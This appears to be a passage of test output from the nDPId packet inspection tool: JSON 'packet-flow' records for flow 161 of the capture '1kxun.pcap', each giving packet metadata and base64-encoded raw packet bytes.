02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1654385146470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146470,"pkt":"nLbQ0+MztKXvZygQCABFAAXUjohAADYGVoEOiIhswKgCfgBQwQSWIbNSmarBiIAQAHrnQQAAAQEICpoJIhIeulb6KGbrQ9NgAoPeIQXK8aNsRvWmWOG2+mJUfVc1tOfBUFm08iHXJpNv2Owf5\/8LnH1ete7iHIgeIQ+NvC5\/VL\/aRL84vFpH3hpuKGie89N\/ltwx+Jf3dMlyw07W7lY\/ANl1EAJvmqFKZxvNP\/7dp2qkMzGNaCj8Doc1sJJRQQ+ao9WYQoMiZ2FUxVUX6mhkQjNYtI4Xmy+wKkhyEHukERva96HY\/dXbvojGVj3HwIwCL7Uu4KCXJCOxCdfzRsyBCPbX85Xo3\/0i+EMzczsTrgKFypwzGJAzBLllK8mrlen1AbXKws\/iFuX9EFW9oTIIiG0ZW4bG5oE4h95E6fNS8I4kaDxPobJq1QBkoPqrtXoiEHjpKULTrft3zYnFpDwQu2eTvwy15CQ2tec5f5m1CtyPkJ8oKSdO\/aLi94jceiOZXraTb6+VbZVTT5v7KqPOtYsl8CgtLKBY9Ot78tCrSByNPAMDNF2pyABksBqbgNk+1a0f6z45tFT7oVWfhgbXl\/on\/kQ2tjjIKII+MrdKpU\/7Pps04g33RP6S4I8ga81Yz5R07ZIyJT6iuback6Gsu\/EUAaiVehLWhou34+zaMkfX4oW8nsmfVHl1TpepxDvzCEYnOi4OxvRscjYz8+bDhvRI9oB6DKa80JOZpGqnO4SIevnAUQte4KcbZKPz6qauxFKMjOPb+Fi92JZNBzuBuVci4AUSISUJZ9pDO344tYqlcxAnz5Lub9aL3azUFNTDSxweDEjd8pW4pwan1wijpkqLHf0vi8uNupO8FH0kib57l4ZodhscgY1lQi\/YP8qhWC\/Ub1YGeDcgEMSVmhxKOxrRmEMxZJH0\/SPVC1Q45KguC3L2a2vUkm\/rWbFirVKvRVj2Z6smUDwqdOzzvBk383pjRzwKiZn+50Qqi6vXyDKsGTAy7P8x6VRpnIzzPW60jAuNOX3Z8JKsQSoQbU7WWYxRsEMq2vDpEdVZDnVZhQNpQTkqwDBMcvnxKwGz371ROj3c1NoOOfCqOGX6dcQUiRIk77k05t4r7lBDoi3JaCOltfNkcyuik3r+d2D8rJRDa0aEaUWI7HzkzGE5xCg05dBJQ+GbxLjA+7YlokrbWDOVI5+7T2BJvj5Z2gSS4bQyr5V6clNZrOF9yEP7TY6KekfQFoBuQkiruOmgQDE3GJilpZpNsJut4YIT7F0OaRSKrHaXWfoS4Pjff1AtIHgB\/bHOLbEtnRDxHNLviswASL0Q8jLLlz3TRCqT8v4o7cRzUn+2eKJxSTko0F7LWInRcpNe9+Y+33MXMVaDAOeHkemly1HrRGPpJskPnYelD9BE\/N2ZrEmqz0vzx+lyA9i46mr4QvLytJqjP9O\/HSqlA1Kx9fxOAXNcAxSgUCEYxWhNuKuqJnLtxuQZR208YZRatEdYzf9DdIBrZeDV9KCfxPH6XHmKZM6Tw3RIrVgIvV1ORu9gNP4ZxWngguwIFKkqm\/QJwvcuq8ge\/\/zWwxnlXlHBvEJwP5OtKAK0XftE6rJHP2e+bJbxwmb93eYXIbhGdyhKZmqch04CLGO8ZQspqifdGuUIlfUuJjFC7hqacsNLSVicuPJzBOyU2NXprEYWc\/OZbxibYqlUXx1QnIHQ5VZlumABcc0\/1T3FfnECTGn8GRjjkVVUZpIueMMQIx3l8RzJtDm1\/VpZNOhOyDZV1UCnbO7S2SykG2XtX4RCuY7OXA8IZ2JnjkHuxMay4A3uSWOFpP5WNNUcHjze\/bYJSsUoGQ\/ieU17tPeq+kN+I0skTj9BNmaip64x8FfSWbU+sFOV0QwBozGD+Lr+4Fx7eGgUibMhfEp33ZyZZa3ve8AZrylaG4wCMpTMxS0GbDni7A5CuyPiGXxt+Ero\/x3NbA0EZstWz0F5lDlbQrK1AfXK7WKby1kb1HGIl\/BAQCaQBP6s"} 14134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1654385146472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":10146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":10146,"pkt_l4_len":10112,"thread_ts_msec":1654385146472,"pkt":"nLbQ0+MztKXvZygQCABFACeUjolAADYGNMAOiIhswKgCfgBQwQSWIbjymarBiIAQAHqBoQAAAQEICpoJIhIeulb6tgJjnFx8hVIwXR4iVS\/qWz5n+Fxjae7ZlUqBpnRyPdUMUd+QilKzXl7OrNKxG+xfS7TEH288LHzxu8ZitSenHMt52H\/QkEpV69+4AxmflPbcyhYuNqtaP02igUNEXeHnE\/ugkiQLtQdebb8RWtY9VsgDPz9GUtPkZLj16g263T23juO9fsws38GXyF\/QUkl47exxYxCkNwjcpk2rfKmm3nQg7N6W0jqeFp1mCVWfSdnf1Y7Ic0aAspDn0dYX7ERrxAbYuaTLxEKrjn9xjqvkkkgS5vTMQo\/QuHb23Cix7tuT4Z1trzTW8hydtgFvdta227DotNH3yGBi4f+L\/4sXuucsl\/ZYz2EwWxq5jcSLqELfJHxFWvLyS92f\/OP922wdIMEUfGBrUGM\/B3JtuZ3WiM5qe4JQxMfqsdaQSk4KNPI7lDEQlXw1h0iteFlx\/\/sbXUFb7a6zxAGqKLOfVJ8nwgmuJ2JJ7a50wGQcZ5nLknIFyLr5KlKTMbvqLWFs2LMvOv6V3ngFYSqCpTCGvq3EMOwjXIRIIPG0xirKad\/WrPQ8qnK75ee\/4IVUZVYuQzRd7olXfWjNWoMU2XKEWOHVqY0lXpUYEDS21smZjZOKOEbaDcPJR3IR2tSF8v7lmhDnC7A1Q\/ZMUecW1YHLZoxctM+TtOWZT+8NOrxJea3YCm9Yx1kAaAeNlJkXZxTsZx9fiGRUsKJUp87laAJvDIbOMmd8r1aoYTkTFmU\/sSJ8mQf2rPRf1eOXfHgrWYTr5hLNs7M38fDRwMZyvGfVF9JaZJr7oby8iyXNXc7zTY2L\/7mbvHkCPWlgDez3Db3GmjmR1B4zzKCnOT+ig1lwwIJo1WP+cxiw7N2K9r3vspvR5Vcuvuh7tgHpWqmAWhI6fetLr\/c2Vl0iiMIIre8vZpLEHW\/nohVeVVUderzf2dVhF2EtWAMquqz+sXVK0WGqetxa0ic3Oqtaq26N2z5MTbOtJmKxpBzaXCwnIzJfbkvT7NrL2Wy0YeTpBNp\/qObq5eeNpmjp1rcehffZdHdR\/PROFB3yNO91UKg3br6J36EchQjn+HHAfILGeZwZXM7g1tOqRvHe74tZLlvy11rPmfX1clEcNLCqdrXEZs6S1hXdICGrhpqkYawHpcEPmYXJpM3IoQIL6\/UfuOmin8lEdLYY6JkRJggUKNF3GopOMtqlw7cN6WYvnHBpqPv+d126Z4G+wSDqysaWGFBAN5NvcQbJbC6Ll61fYucNIkqNOL0YpI0ckzNHkzp7ppuY8oO9Fo0pVc\/ohgagsAS706RZzqtBM771ss7i6ivGHfRBZEjjDIPKsv2Sde9W91iB5ZG1lvOyoiXq+e07SLSxfFtviLdcctt4TbAeowmTgePDz0y3L9AurZZjU4HIorixz5KJ77M2+G+AlWnTOSYKMX0u9tKolMpL1eyCxnoAOfARlh5LFdSrBlImUb8\/QcBlj5qeZRDZQU0B+EzmE+arAHNjN51kGTW6D7VQMJR7u4gZ3CgkHpJn92AK61mPx3iPbbQMIpDgyBDREkqY+81rw9F+VEBGuxGn2OHvqi\/vOzeKm9iM0LloHBhmNL2zynkkneVPICTPD5SM+wMcfYdktvf7olC7djwltDQ1vQJ\/I6RAWfvx2ILm38PTiTvZIBEmYnoBQhOQ0E9Tb4QLfGTKne4btkpduZDgVkqDxDm78xzn71taOI7rLMzMH0SBU\/TziyBk+2oShCxYgmdU0iKDT8r46zjZTZS6v8mEtsdjmBbH7cPpyTT7gKEtnM8zptXWSIhlVykpGlFGFVQescLnpMRvIoRiJxd6HY25i8Q8badO8aZYOw0ti21cGDZu\/crSHqlLbfNys9iM3fwPZY8F2upWh4BROkh4t+NK7aItRWXKGLcjiH8o43WjkrzjhZ62eQB5Wlcc+8CD6CzKirazoV4LzmmyoNOd79K6CEyxZs7LfkoWUz13vIVl5saV+gwv\/uDP2Ytl2FPCGdgA\/v6tuERAYkXOh8gIh1RlzkPREpEf18veddCRJ8z6MI1K9LoTela\/e9o2mTY2e78QaKnXoqh+gJEKGbQQuqA2rJhJstN3uX\/EaXiA2PLbbBotmQW0YcCmKQgJE\/mvmHOw1Qun\/4swBH6823HVEWmKBvS0oVgAqI74vcVeVMBLwWco9z3HlrXT3tEaneofEZozkE7cn9vQB9DnL+4knS9sv3ucRAaCXIaxI7xyr3FbUUZ5Rzhe0H\/cYTVgieCFjpL\/MHbGwM8eU85\/OtgxMEUVvx+FYdQ\/Xus4ZI3uf5Sccum7RwRDv8sIndEhRGPvW6LqHIsTfNccr79CHKeIR7FkuijEUaO\/OqYmPbzQ9YkqFMB0+Tu2de\/pxeyvudZ\/WVSNhP43OsfPzA72r+zg5t61EFhlrL5bWOOEBWzBkPF1I8X818Sf5\/376K5qlegKQkwXbKRdlJ+dBlPBuUql1J0vaDbHbdtkri1pYwK7wgzini332ipIKeGOeTt5wWKs\/UJc8BSkGmhIG8Xe4f\/NsV5rrZCacV9nG2hTZxgeB0tylrutu\/sCHQNDsVGkcvI3gBB3q\/0vTOgej\/JcQ4b1+hotEGJylJ+eyNmc8vorXCiSHXRHzvzK6jk4pp+0UjXNTxLiHVg4qUFAuiZDIaFzX4O6D8VhmHlbVkYqgJqOX\/uGR2w48wcRx9Vc808nXu61mwFTYRoiQq6\/ejhNCo1BFujUS+hAxzQetpO\/K5aXDdT5Q4tardwiCey5R\/S0MvN5lfkF6zaPhPSYKgg\/PVYZCAciZA3MsJgF49NaKBsik5yEhsb0fgHIH4GeJ4dVGypxdg+2R4daILk6+rl5UnRJPB7824ueIIesQbwA0lA8APOM9i8n2eIOONbuW4Fch\/s9RoyFD0e4YfBpbfMeHceRyVw\/U8NAA5miKE7gJ9GuxC\/pLi8D+krZcFlG5qjZxha\/2jvFLl0bUDdodexooW3iKcNN3NfGh0KXY0d1erClHiGv\/E2Ibb5QUKKhz1HCVfievXCuKd+iXQXwtn5XRQBAaoXdqYslwAQowDTy2gnBMtD6ROBrw\/dyxwRv6sH1TAiCU27nx40639\/Kn+\/kwQflJnb5sjgxAjt821QivnJMxkYJXQSes9hrIx1+nbdW5JwYP22DoX\/Iaf70c5QuYAq3SeuASr+5zuspK2w5qYnsSROZDDRK1QTlHH6uPedRlv9zXiHIQFrgkR2ksd74RBk+t2ovUESSY2bLpgp8wt6Rc7avWpejX4lK\/vTU+HrSv009gZNULrkFU9\/s6bchhE7dkLoaS9\/GzcGhWo3CsP2t0nCGb\/Td2B4xrEPMjPUmL4ec+Izyi00UCIQHdfHsIo6Yd9+hdY7bTkFVVpPGwAIAMYFlXoP+4dIvcw0SwDKskFVWrE53M6bGPKkMA9fESSRf2TnVsJt15VCvXBWWkgs1da5ZsxB8Hxz\/dYLjutOpGakDlN+mjMre8L7PKV4IjOXfFHcklueZlHFfMiKOoAxAnQsxhugdCoiNxI4bCX\/geE0qtc5uywOU\/zahO8RvxDDLxVByl6CpsYll7DpRqay8ia0LpurHZOx2CQoD15zpPDCwpCtrdWUoyRdrGsxmrJ2BOXmiQvThstJVPjn7OD60GBa9VTfhetSOE5A33Rrn5fog05TTsAblGiM3m9yb24drHjEj4HLA0FzYwHEpoPH2DAxRl\/HcA1RuOiYRnNIrcG7werbjY1M3Sa327qYs+3pKFYs\/a35vcUkW6dvfmHWdKRgkl\/lQ8+agNAxx7ytNkTHTtIqy7B8vZAL8KUlPxSj0gt6f0aahHlR4x8+DpVQ03HO6DciE1DtOwpSAVp71Kx1IN67DvbZE5puszzpjMOBMXrHN6EAiyiDkBLRIljHommON+R\/R7kjaffp+gcXAJOOcCJgwyYulXqPEcVjm1lVMWAs1unY+V\/F+uNEJlU+n7ycALtMx8JoapYqpZ\/YERl98enXpnS4JSwG+uXe5eti6wMKtUHR0CpD0ZTaMF8UeGRH7e42Bzv0p2Tu8+lmtnPsKgFOqy4qM8flcxd6FbT51bQmVGBKOz9hsmN+xzNeSS+G06P+gRajneelM9Ml6rshA5Ze9XZNevJ5URGA3+\/4zmL4ZChYcdSj\/dpBrk7KKsyykmGEDSTp0wnUcOoEbwOwdwy0yJSEcPdp5r4I630fJq1ThajSOsveqsNFTGmChRopw616UtUsJ34ZHIEkewDajBG9ciLWIlp9JmiNQA5sdS6h9RnDTz4gD0aZFiDLoQvN9kPOuOrWZL1brHSxQcSnrfMBFNQDS\/T2UGyKc\/3NhjlcLneltmMwChouJwrB1wWnIC01Oz5ybtO8pgf3mNoiFgyjsWkdAUm\/Ilybd1rbLiMUzw1mCAstjt4EOmL7ov3wAjxxXQps5EmW554KBvP1pDfN2rrVJj8KZ39yz2IbgzFEgyGCjwvymAdcelaUJTipIuCs9RDJdcgmqgxPTZvY0sCT6yaegqEtX8mPz0dFB1wQRMIMB3iywLf+BD8w2hn9fbF88bQRFOTjbN9RJAZwgsHlzOUW0OITmS8gMTFjKFJXyDwGQs4V5LS7fkoeavVxpcEnLxnIotXgNPlS6kU3L2b+eqbGq3yEqaqKVaaCBZKDHd4RSvx6acZ5pMN5tixoPl4VRZTUbncjR7CqssSBkstKemgBJcL5ptv5lHRt8KC8r\/D8drxpQU6SzlMe8Tdv4CsPsMIr9ShohN+dGdO\/Q+YZ4MlJdXIWpPVis9KcBa3BMSAQLL+wlyCrC1DxOauyiJX0pZwmBAP3uFWYpTYr755AsZF7IZSWbLH99OcdO6P4QCsINoDJupHWX0kT9\/ILwvpJZdiJQ78usj3ggE6ufPm5r97uptNSwYWvSBqmpmh7Os4JXPxuC\/oYA9qP+88oU+8sIO935wIdjeKeCSU612zzY7tJRMPJqwyaKqX3F2Ml4mDMtJUpcDHDxd5wHlvcRljGERWhx34qQJ0JL1LapC2Yuq4xWUrbCUWIVjCtmYEfa\/GCOhoSh\/4je8dI1vcbamF7eNP7KRXq8\/j7\/0nPmbGsfJ87rF4KGJE3MFdoClkAlUUrRLaHhiG4eZ9J4RLozN7GBOCkVWWHN5ZAcZUx66oyu0r3mEpWpEYuxlZEtQ0a+RcselQYXz6IuCnJGCHSF5B1YQT8dtCh9Y2xHMplEk9aMjzAZ5TsQ0q0NkXMybToCx5ubpzAZVkBaOnBDwCW5JzH3qkO4m1Y8AzssNxnQddR29gzWPYQyg0Dcxm1OWwVAXNJ6\/SX+S4aDPDV8ymCuPPXQzFDKaJwJOJBrmrARsHZLfI8bbIQ48Fh4G63fa81NkkjBQxfp9npgdy\/bdQCu13ZEFuauYxibrh62hDGVsCl\/5SGVGkTy9NgczZgb\/uar58fVvbN7SIf7HV8afG1gmewssOzVfLq0EfY3Ny8+KiXGGbDHWzNN+mc76\/nymmxBGf58LS4248blw+sucBQGQVLLDUzJUq6oCJofVMo41GsNYXtH6fOPynAzsThq0D8e+jjNCAqLVtm8ZFeahT2ZPmol+LspHBXCkp\/yVPnNsRXEIy1hHfAlZS0eNlJe3RBx3FXhymlEy7K44Tcf5Ni76LhiEOGvYVTVMa27PUfsI40MkT70x7ieJ6FYRIKzUIbAeMHnpEkcHFPy4DbfR3wCD0UChKwSlx6Kady5x470xmBx8VRGz7irKrOxiLKUIWgrzkoggeZwA+lAGQDrqHT4AOKTC4DlKf9XMt2yEfQN1DUxCliAnWe1v3AxbxHAnyrrdBz6rSSe\/EJcFEJPHQDm+UYHvApVKxi\/gRer4sQcA9Qcm4hgZstp4uGyIRjL3SbYY5uAltDI2U+EomQE+SZc99KHDAr0k8k8hb9Gg70cpj29qmGLTPb5l\/3DHw3hH2ywNNERWgs\/V2+UZND4pdNNwRg\/WA+n9o67rtYl6LGQao0ud4GmQNsHYt2eZIgivRYvM3TBPzIaE0iufnYlLjU5EqGxmZxYs40fwTKrnZoQgbAPIbIFFZg6BoCWJhCmgJD78iD4XdzxPvjyshu5A2Z2bNVwSD1OLUxDVRqMgDlcZKJfm2T44YKUT52rhectH4b2OTCH8c1O1WuFpSgRsi9xHBFQHaShA1XiZk+5tiBMMFCLFcC4MqRhIryL1Xt9kVjVw+bLo7UNTs4gMlwM8op3FwFU9JdV1TUw4911Ic+da4z2g0M4eomEnD16ypzV9YvE7PbfX4mG6DIOC7sus4qkeLeUGh+og8npF10LZ6uMQ7NO1jiICa74N4qYd3biZ2PKKCUPsRwiQ8GC4+aFT2\/CElHV9Tus86MeNo1mbxN0MelU9Tv3Re3vPhxieigjbNNg7c8NH1lbKWgphzZEQvqW\/1D\/3eHKWu+1spZcYRk1Cz9Xq47QMTDt1ObhcMRa5MC4OOHU9i+rgy4fH6BSRbTrht3nvfqMzfW\/xgs33D0hwh1eVnBf0PGbhUThT1lBj1exyTJfY0HWfjSfQMcp7I77rxN3+YWgUHV7XikoArasQLBJv4w7LEHyPYY\/+Vj6MwrFWHNchEMNzwTrvd5gF2snhY5eOtRIPg+818Q42DU6OcV4f8vlnYUQXHJ8SkRn+4youn3U7Flx6hzGqd2Kq6kiCNHucaRMmTmTslKYPmix\/DLodndpVGjrAX1amNgwhKlXOsAMB0\/QNROKmcB4zyic9xrBg56IIaTIyKlzKqtQmPzvNxhGKlRMnOEmeJz484gugsUkGQRSGZsTn752c5fp\/IEqJ8uO06Q2Vk9ObzNlHD2qPgNr3K3prb\/xFlwsiNhd3rnU5zIz258tFai7AkGw02iNoM0TXj+mXQMzdOfh3mJ0aCjK6QIj06WOb49ENoiSpchtn\/rXre0PqCm0oC0LPzaEBWDuGyE4WXyH4B7RRFmEYW5slZ9NTVAoOblrF12bwGWUWZDXYeyloF6n2uG\/o9NeOXOAgOMUn6Qv7n9BuhyeC2CiXSHy9y1DZpR8fSv4tPvT6pSWBaQzn5OybvIa4qPoDDAr\/aevKfSF2fAXnhgGWBUOOTRt+hLhFaJNdtqvRBdx51pBwyIqerZQgU5FRr8SgKQNR2Y2UhyDv23ipzi5YxCcOTZ2jTSqzkEdi3KYA\/wG2cHQGq45NoCTDSnVcPFIudxM\/3a5ry93rXYJZAqX2xeRag6MeTog5DxqXTWxNXleuzrGrp18MJKeuCGoRELstSBk\/OXSRnOOFYAISrRtIKiI1BDl2DG1FmmhToIftE+V7CVluP2754NMSG9uzEeQs3I3J20AiKP212JKOjSwfMFHbTzB6c\/OS\/Dm0j1XZljzAYlUs\/kR1qNINEaMAzMk2pimuLm1hyN5pCk7gZCbYyWGF19\/AwcjkwRD7ghvW+nZXFjdan8PU2wH+591yQMbZ4MbTPbDRHzTL7S+MBYJ2\/sXwg2MY2ZLdztxWVvTvwKnb4PuBIochmxGSp1IXlXQtqTgOX5IOA87fk9yU8i9gc\/SBU9pLrPV3l7cVmIltaUP1TvVwUXppaij\/K5aaC2mJHbFTV4B7kJBIBm8TkDKSz4XSAvvMjAepqD1w\/bbYOlro\/h5d5JOSsR9PyLluINE\/74JuqI68WT6pjkeMox1U3aIghcOOrBvzNoBWC2zU3s0wAhOhXJ5utKtCv\/KPcWNPLlyQqVLFYwGgRuUQqNX0zUfdr0E2gdcPE6qpwGANOs9GCCLDTiiLS7bWx0EfgcReMav5+JEGXSdNByKxrvNDELfM2q+bwY61CR38rzDlmu+d7kCAJE0MfDfOLlvE8jPIcfNslyerg2Niox3zzOOsva9xFQ+7GfKZNfnjZtuNFyHUvIFbrlEpcW2H3B5GCMp18jQh8pWrdZczJcc4Aac0gIh\/f+5s4pgV0LPnYCY8HlcVR4B4j4rf4MStSEHzAfZpX\/kYYtsvurzT9EVgYdMvT8FS4jH1W2j\/U2PegzKYNnP3wpYj9CFYKs2jYvLJ6jvD1XhhfR3HRnE4jc6VMq+DDRHlKhG+mti4SyS7RbgLoH\/gHbyMTarFmt2bNHYKgQjqXC0LQQBv31rntuVVHOOazc1DgG+ROX4T5TvwQs6eGOsWbdrcKWpAUmYroutV5glxQd3vGWZ4LdHNLGKqFDSFYJ1I0CTO38x\/0iw1\/MjeLEzEax+jzi2\/wKhjbPMsNk8t68JhGz+VuwI+Z5Ej3HZjM1rMIfExPRP63c49wg47vGSDiML3Kmr\/StRE1KB\/dkvjdDFkp81ryiM0pXrciOaFy7FbL0Dp3fZxLadEpfIvFfiC+mJ2Ig0nQBpqbcfxtk+uFym\/A3yclkZJ8EsWa66dmsk7IUIuXnp3apKNGJQGgbKfLFoWVWK9YsgIPRVOO75R7xDUz9q+\/wdhL6Bvp4iVjP\/YAR07vo9gAmjCQqesZTMhTVAMuXwlERPWl4wtpF0b5ylA4weK63l5VHHeTekepPlmM2ZPgEhPena+eVgrgDpDeBxLVpfjhJdh2pAkFl\/Itj9E+vplhUX79GInBhWr\/Rf6Tjy0aYfZr0bWyYSBA4lA\/R3m1Twy1xWEASJIZt7RakdMzwqSqsG9lO3ibhG4+RjlC4e4GdCGiyDQQToec08qlMrsb6jxurIYsIGEk0i7kTLCjGpt\/7opsmGBM18NONK6EMJiKHTtJSfE6GUrWpQuY5SLFCm6gA8oYUuWrxKHfQRd\/xxiqUOBihtPkSKSDaltV17NwQz36J\/hq7FSp7FqFWILEjYV11Cz4Q8VPxjhoJHSi13GdXpUqGm0GBbQeg63FDVhJQnw1kGtMib2Yf9xU\/2NEYFFK7LIAJAM2C\/v7UelbF21DXicOd67I3RYOxT1R0rQngFVKN0WCK5NYlT7XyG7Vg7YSWOnN7\/AUvIifx6LyicWi1MO\/4j\/tgTPePrYWavU05+b\/X0YGJw0tiFpwX9M80SUeMxuOtQytXsEqklHKltggwksPL2krZgWHjICBOqob2ykobwQ0UULykY9YgOW56Wme\/aLiUQFq0Q7CcJZ89xJ\/42FYJa5lXYH0P\/TM4DppbEtyPFNh\/67NoELB1LkZzEi9PSKyDlIw46NiRT+b8O5ewhbmvpaPcyjC4QGwhHZzbE41F12Gy\/a+cthlvd2qqfwaADTIaDQaJdI025YNkamWe4oPvNi3l6\/btVtWfpldldFiHyFKr1pGyZMk9EyWmCwq3P2mU8qw0zx4eaidYcuaF11F2nyih\/1jIDMAv6DecOtXXxaC9t22nVGRSN2I8zQDT9Yv+g6EKkg5IoICNkMCVyz92eHyfhPo7u23FiB\/HYWhItSJu930LbuZ16E7PJVHYerZwOmqZ\/vHjb4AV0+CE1EBQsVH\/i2r5kHBpovfS7O+8V08ldfPT9A3jWuRmId2jZeFrX0Y1jW9PPFq3kN\/8Ayx7DJya0qzksVuotjIrX0kEdictLzsbhV5\/0DRM7eZLpfc2JKjGndPrkLjiwchhqshbFfpzbxelwMx6zZvb7VmHdVgFsZB2ze7oFfvO81oB5QZJiUVbpxPx2JNOIx\/pUhvvI87IOIge9wOl382BYu3R4q7BkQ7nVP831IaIBxMgFCR7ue0QA5EdpeatlCYAih6CSKLm\/EIRwc3WEUYMdgE7QnPHHL087HqX\/nntbgbSfLUOAnAXQkrDsSI\/TSAxhBaBv4lWfhqaBNKqEQBg5aP\/h0Ai59KLBeMmkDbSqMKamByL5gQBIpRS9y4DrX\/1ERo9Ya59pxvDSpoLKXesALpxgN9RW16xMT7IlPWcBlscjLpFdFLypa5KLH+JTwfsacKE+sa45b49P3tnkUng6KPAvvPrEfY5j4Ds9+GkLoSbIbH5pITuii2U++Fgyh5URgBWDAKBXhsyZpFCAu8Ej+EFhSgesLmUb51pN1UQjHpHOpNKENl9i0RNhG6FXM1qXkmMu2OfRbi2cGhS3Uag2V3K3TnWZOyuwPzDfHVNY2hiKBItohKS2Toqg3LdwIX4ALpN6jwmMY1vJ5pN8xpvy8BhSbpE+drY\/Um26d\/568MLTQYvxke7bs6JitpSjGt4aTSaLzEFOAlJHpgrPvyGdkbKOopCOalf5VBHqUYEqNlCcQJZGcKuibaA+CKhOcASVH\/dVK\/LKcHrVhSKTaRPzOYsOR8cAZDnbAUwFggdNoyi5AiVdH7pYEQi563d4YRRkaDPChr2MwLzQE5Z2eygLLEUTjZauDGSZY2STnngf\/IFlcIvrZPeVh\/jylOHbUswONx8QlhfQYnnpy\/R85Na3DWMvwXLNBAqERWkZZKomQMIbQIRE0qyaS8pD\/S1iK2i0+KCh9nzrezGe2syhY9R0fJ\/XdWKevEaiI7kaqf1UefkR+nEV5Ton0W3N+LiNBqHq9gt0TY4ck8lB4MOrVIWh06NYI4dqR2XxG3d8UkPSyGsXZLY2DwVVGbGGG3rwPTBOXnxm94DBLqQATM9q5DPAAAx2DozZw5dByVWvjGoJA8EL9VQXQu1lEGLqJYNQyIVCkF6QW+5MjxYTioE4qtS8rNVnHqY4P21Cf03AxWuudr20+kG92517E9SQKKnas+QXUuGUrnpUjVl4By\/KUFnJ2+xdKCPpA+KrtUxlUnhmAvK7qpU\/U5QYVZWIgUVItSRUkOwG5PSUEUhbpCYjr6yl6lY88iNEysyPHFRS9YSqySI0eVc4rm8ImRTMH+ksOCPGH2De5Qn59KEuuVAecGPg2\/Mcddhn3Py+S8ulYnzyXMfE3XFNwHBvEiriFlv0XIjjwyA0r9hXwjK+aNKve2FnBMWar\/l13ISuiDDW9Wbg2B0b\/vKVaotaIqupOH3j6LXyhskiKT3XLI7kub+w00Rn3C\/2vUOopzgJn\/xBSioIUg8DQ8T8MFORO644OuC8Zg2RMpkd0tJgqM3LWCw3sxuSh6Vb4bnbfBDuAymXSjn9qOspEuBCeA1Hnqk6Z7EQbzo0cy649zYnv2ti9ahEUhoAM6L1YzTESZlB15lVjy0qDCdjPm+\/hz\/W0kOxYPfdhaIMKTSj9xaVgzMeNpmM0S5rGQwr3gvyFZt1867yMXPHyrpdt1UNsFQKFZyfbkG32GuCiNPP1\/QS9MzblcB5bksx08NY02uG5jalIPOsl3bAejoidRCqbCltzBCzag4e7AV8mQbO9hTv9z3eezvEGVMUsgiRjtDYdjvfVGBECkbf0ru9ReTmeGO+XvPbgeh2Ytdam\/apmAzbSJi1xS8AmGJUoNBA\/uhYrOfNjLMBec+NJqM9y9hzTfVeV7g8deX08XKP6Wz1myxKm8StLXGSkGfZS4O8ue1F0t+84XKj+3ZDouQUimMXjbIfKPaQhrIbUMK0vNtEpl+VtmSV4maqKwSVJ7EKWx8mI97X35iYPD1tvVSsC+LuPG1sPdvVCWQAiSx5sPOhx+nY9D0WgWtXvsyxMmXXwsz5yDIIG9aKaobKMQUTL8bZhrsfxI8oD2agVb2nqUAjSKOh9zA\/9wytMaN25ANVHe3gBEJur2EU0X3hOY5ITCD6HlgNXujbF0w1pIHw20BLpqBwQEEkLcHAg4VHX4BErQ1dBihCwT\/2cz8UPavHA1vbsDMAzxL7HBUf8cyofB6qUwvEP4\/O8z3KDrPpiGvBX3vGX2DmaYPwalg\/6jfs0hNG48mzt8+KrQoPXg1DYsRhwUShkGdH18juAZnuezGG9WMvdB3335J6xvq5xPaNlLrnyvPE00KysWdfWJefGmFNb2PjVNQ4jPs4ADPpqCp5NS55LkgFbcWZeLdV54Km98\/nNOiq72XXX0hVCnoHf7x8MuDyH5Z99myGbQTEr28pbGOfPXI3Jc\/u6q48VW7Gf2nEAWjg3fhYvhsAxhuosw\/1EaG6p\/ZbJTxd6CN4JLT5seUTCi3M9JEJm0rqpM4PDjdjWIAgDQqDPY76K1vB2PLk1lvfOfzwYGVj3zOxWP0mFhNK94nD7N3RdWWhuPITS4+5DaaxXzX1CQvIHK3CFA7j\/mjof5K5e\/1VV5szNtlTZHK4KZbzNnrMdm\/VWJGF0BrOVYUt0Sbox8qJLr6\/GwQJMk6Qenqonnn0f\/MPHWKYj1T5qszcd6n99XKbhzvW6nsb5wfGdaVhsp0WI+f7oMOfujihusQHk42NzfeiHuuZye5bILBKJs43YVrDT4cJSW6dKJkyg2t0rrscPlPNCdX2lPQIvq7EnSH3ACRL20hMeltlKW6O5c7ChXj+Pz\/Eb+vmo0e3DNCUI9apyyp2e3PgufsUcIkO13EGoqcXkimky1tZgX\/9bmhoxlxxUD7MhwUa3BuDottTACLzOvV\/prJ82LaEy\/UQo153zPT+JiyiUiAubV5ORlTSfUKA0OMLpIIUp7cc4fTDsEA80uypKBtae4x0LEbe+n7ERSTiUt2rWa5b0en217CsosrDNp0yJJlyM50Y6SPOGqvMInpBnZCX4ar7m7Zn4pvvNMmY4zwvG2KltKcdpuRZoVaWabSaRpQFcZCpDOa0fDb76nxwiIzH9mK2mlJ2VXZ35a2mmQVjdIfHxQAD20lwC9v9NtkfHuvd5D1Zomk4+i3C4WCanyKbxgGWu9ey2RAtqmKIAodDCCQCPfDkDQXsrdCM\/GdiC8RaY\/PlhKudY7Hsg9Dkvri1jMKoPWaTG0EQTLgPENU4tW5db8rawHN6ag0I37KiQuV7bX4Us+KYD\/G0wjqbsc0MNgE5TopN83GfdbMHM47m8xslieKIeWwh2yhJ0oDDe+ycS5D3yGepy2vgQj7gcZPpNZzHI8dW1I9\/d2z12KhcP1EFKOVbJ3C+agb7xgmovXLvnNR5ve1uu\/2B3sHt1h20WuMptiUGSKyUWmXjED5ECXcUOtBUk52E67\/Fcp\/1WVIMkNx8FYoRMsHmOR67K+ptMDhks2raXq6u0EVRyUNZ31hfwA9d2f5gfWL7BCev\/xhVW7Vc7Row0PSNajmpiuzsVqnaCAIZY9M70CrsgZ3vtmFqVaU89UJD7q4n6Pu9YGh4K9SDiG1gY0EG4QWHI6lp9FpFfXNvA8Db2MG7aAkeQ1nZaljfPy4SPh6KU\/ocbwtWf0JnzPYS+CU1qKrnG1G4Q